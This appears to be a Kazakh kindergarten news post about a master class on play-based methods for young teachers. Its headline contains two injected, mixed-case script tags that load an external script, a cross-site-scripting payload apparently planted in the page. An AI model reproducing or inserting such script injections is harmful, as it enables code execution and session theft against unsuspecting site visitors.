"Мамандықтағы алғашқы қадамдар: қолдау, даму, ынтымақтастық"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.04.2025

21 сәуір күні "Еркежан" бөбекжайында әдіскер Серікпаева А.Д. жас педагогтерге арналған "Мамандықтағы алғашқы қадамдар: қолдау, даму, ынтымақтастық" тақырыбында шеберлік сағатын өткізді.

Іс-шараның мақсаты – жас мамандарды заманауи ойын әдістемелерімен таныстырып, оларды мектепке дейінгі ұйымның оқу-тәрбие процесіне тиімді енгізу жолдарын көрсету.

Шеберлік сағаты барысында қатысушылар шығармашылық пен педагогикалық ізденіс атмосферасына еніп, практикалық жаттығуларға белсенді қатысты, ойын жағдаяттарын сомдап, балалардың мінез-құлқын талдап, тәрбиеленушілермен өзара әрекеттестіктің тиімді жолдарын іздеді. Ерекше назар педагогикалық ұжымдағы ынтымақтастыққа, тәлімгерлік пен кәсіби қолдаудың маңыздылығына аударылды.

Іс-шара жылы әрі достық ахуалда өтті. Жас педагогтер алынған ақпараттың пайдалы болғанын атап өтіп, әдіскерге алғыс білдірді және алған білімдерін күнделікті жұмыс барысында қолдануға дайын екендіктерін жеткізді.

Просмотров: 266


Пікір қосу



Деректерді қолтаңбаға қосу
Текст